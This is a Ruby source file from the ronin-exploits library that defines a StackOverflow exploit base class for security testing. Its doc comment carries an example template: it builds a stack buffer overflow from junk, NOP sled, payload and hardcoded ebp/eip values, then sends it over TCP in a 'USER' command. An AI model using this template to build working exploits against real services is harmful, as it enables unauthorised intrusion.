lib/ronin/exploits/stack_overflow.rb
# frozen_string_literal: true
#
# ronin-exploits - A Ruby library for ronin-rb that provides exploitation and
# payload crafting functionality.
#
# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
#
# ronin-exploits is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ronin-exploits is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with ronin-exploits. If not, see <https://www.gnu.org/licenses/>.
#
require 'ronin/exploits/memory_corruption'
require 'ronin/exploits/mixins/stack_overflow'
module Ronin
module Exploits
#
# Represents a stack overflow exploit.
#
# ## Example
#
# require 'ronin/exploits/stack_overflow'
# require 'ronin/exploits/mixins/remote_tcp'
#
# module Ronin
# module Exploits
# class MyExploit < StackOverflow
#
# register 'my_exploit'
#
# include Mixins::RemoteTCP
#
# def build
# ebp = 0x06eb9090
# eip = 0x1001ae86
#
# @buffer = buffer_overflow(length: 1024, nops: 16, payload: payload, bp: ebp, ip: eip)
# end
#
# def launch
# tcp_send "USER #{@buffer}"
# end
#
# end
# end
# end
#
# If you want more control over how the buffer is constructed:
#
# def build
# ebp = 0x06eb9090
# eip = 0x1001ae86
#
# @buffer = junk(1024) + nops(16) + payload + stack_frame(ebp,eip)
# end
#
# @api public
#
# @since 1.0.0
#
class StackOverflow < MemoryCorruption
include Mixins::StackOverflow
#
# Returns the type or kind of exploit.
#
# @return [Symbol]
#
# @note
# This is used internally to map an exploit class to a printable type.
#
# @api private
#
def self.exploit_type
:stack_overflow
end
end
end
end